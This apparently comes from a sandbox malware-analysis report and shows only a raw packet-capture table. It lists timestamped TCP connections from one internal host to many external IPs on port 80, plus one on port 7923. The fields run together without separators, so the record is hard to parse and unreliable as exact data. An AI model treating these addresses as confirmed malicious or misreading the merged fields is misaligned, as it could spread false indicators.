                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.705579996 CET4974380192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.710592031 CET8049743172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.710659027 CET4974380192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.710937977 CET4974380192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.710978985 CET4974380192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.715831995 CET8049743172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.715868950 CET8049743172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.398036003 CET8049743172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.398101091 CET4974380192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.398140907 CET4974380192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.403007030 CET8049743172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.413337946 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418312073 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418382883 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418502092 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418525934 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.423341990 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.423373938 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.078748941 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.078818083 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.078866959 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.084050894 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.293093920 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.298158884 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299209118 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299376965 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299403906 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.304236889 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.304251909 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.272229910 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.272378922 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.277576923 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.277631998 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.310250044 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.315272093 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.315359116 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.316514015 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.316553116 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.321386099 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.321515083 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.887487888 CET804973882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.887593031 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.887628078 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.892508030 CET804973882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.930238962 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935184956 CET804974782.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935257912 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935396910 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935436010 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.940233946 CET804974782.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.940247059 CET804974782.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.978889942 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.979032993 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.985234976 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.985286951 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.009844065 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.014915943 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.014990091 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.015181065 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.015197992 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.020056009 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.020107985 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.651983023 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.679869890 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.679891109 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.684770107 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.684859991 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.824629068 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.864861965 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869827986 CET804974913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869880915 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869976997 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869997025 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.875292063 CET804974913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.875307083 CET804974913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.877150059 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:57.237127066 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:57.241982937 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:57.508297920 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:57.510611057 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:57.515425920 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.305274963 CET804974913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.305416107 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.310559034 CET804974913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.310602903 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.338917971 CET4975080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.343806982 CET804975044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.343874931 CET4975080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.344016075 CET4975080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.344037056 CET4975080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.348786116 CET804975044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.348830938 CET804975044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.009752035 CET804975044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.034487009 CET4975080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.039633989 CET804975044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.039715052 CET4975080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.201812029 CET4975180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.206691027 CET804975154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.206818104 CET4975180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.239264965 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.240247011 CET4975180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.240308046 CET4975180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.245035887 CET804975154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.245187044 CET804975154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.468127012 CET4975280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.473179102 CET804975247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.473386049 CET4975280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.473386049 CET4975280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.473386049 CET4975280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.478307009 CET804975247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.478832960 CET804975247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.036258936 CET804975154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.037993908 CET4975180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.043024063 CET804975154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.043092966 CET4975180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.083280087 CET4975380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.088273048 CET804975335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.088332891 CET4975380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.088469982 CET4975380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.088490963 CET4975380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.093290091 CET804975335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.093302011 CET804975335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.920274019 CET804975247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.920546055 CET4975280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.923737049 CET804975335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.925860882 CET804975247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.925918102 CET4975280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.952903032 CET4975380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.958133936 CET804975335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.958189964 CET4975380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.067357063 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.221203089 CET804975413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.223644972 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.224255085 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.224255085 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.226809025 CET4975580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.229053974 CET804975413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.229070902 CET804975413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.231899023 CET80497553.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.231978893 CET4975580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.232250929 CET4975580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.232250929 CET4975580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.237076044 CET80497553.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.237096071 CET80497553.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.892689943 CET80497553.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.894083977 CET4975580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.899451017 CET80497553.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.899502993 CET4975580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.930010080 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935084105 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935600996 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935746908 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935771942 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.940576077 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.940587044 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.622211933 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.651112080 CET804975413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.653321981 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.658446074 CET804975413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.658754110 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.669987917 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.670022011 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.674736023 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.674758911 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.764630079 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769486904 CET804975744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769562006 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769706011 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769706011 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.774537086 CET804975744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.774548054 CET804975744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.840455055 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.884303093 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889101028 CET804975854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889163971 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889302969 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889317989 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.892802000 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.894071102 CET804975854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.894083023 CET804975854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.033519030 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.058646917 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063545942 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063620090 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063754082 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063786983 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.068546057 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.068561077 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.205446005 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.231360912 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.236231089 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.236309052 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.239578962 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.239610910 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.244582891 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.244678020 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898284912 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898834944 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898977995 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.899441004 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.904290915 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.905150890 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.905220985 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.905227900 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.945480108 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.945713997 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.950761080 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.950786114 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.950809956 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.950865984 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.951025963 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.951046944 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.955816984 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.955831051 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.026401043 CET4976280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.031409025 CET804976218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.031495094 CET4976280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.031634092 CET4976280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.031647921 CET4976280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.036644936 CET804976218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.037034988 CET804976218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.595192909 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.607525110 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.607559919 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.612632990 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.612663031 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.754420042 CET8049761208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.793657064 CET4976380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.798708916 CET804976334.211.97.45192.168.2.8
